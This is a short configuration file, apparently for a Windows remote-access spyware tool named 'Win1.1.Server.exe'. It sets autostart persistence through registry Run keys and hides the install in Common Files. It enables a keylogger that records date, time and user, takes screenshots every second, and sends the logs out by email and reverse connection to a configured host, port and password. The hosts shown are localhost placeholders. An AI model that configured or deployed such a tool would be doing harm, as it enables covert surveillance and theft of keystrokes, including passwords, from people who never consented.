
[WIN_MONITOR_SERVER]
DATE=17-Sep-2005
TIME=02:33:53
INCLUDE-CONFIG-FILE=F
FILE-NAME=\Win1.1.Server.exe
INTERNAL-NAME=Win.1.1.ABCX
INSTALL-LOCATION =COMMON FILES

[REGISTRY-SETTINGS]
REGISTRY-KEY =Ax1X
LOCAL-USER_RUN-ALWAYS=T
LOCAL-MACHINE_RUN-ALWAYS =T 
LOCAL-MACHINE_RUN-ONCE=F

[KEY-MONITOR]
INCLUDE-DATE =T 
INCLUDE-TIME =T
INCLUDE-USER =T 
UPLOAD-SIZE  =120
ROOT-DIRECTORY =SYSTEM
LOG-FILE-NAME  =\Keys\Log.FILE

[SCREEN-MONITOR]
TIME-INTERVAL =SECOND 
FILE-LIMIT =400
ROOT-DIRECTORY =COMMON FILES
PICTURE-DIRECTORY =\ScreeNM\xxx\xx
ELAPSING-TIME =15

[NETWORK-MONITOR]
REVERSE-CONNECT =T 
EMAIL =T
HOST  =A:127.0.0.1
PORT  =3000
PASSWORD =abraham
EMAIL_ID =v@r5
EMAIL_SERVER =r5@hh.gg

[REVERSE-CONNECTION]
IP =localhost
PORT =5000
ATTEMPT-INTERVAL =5


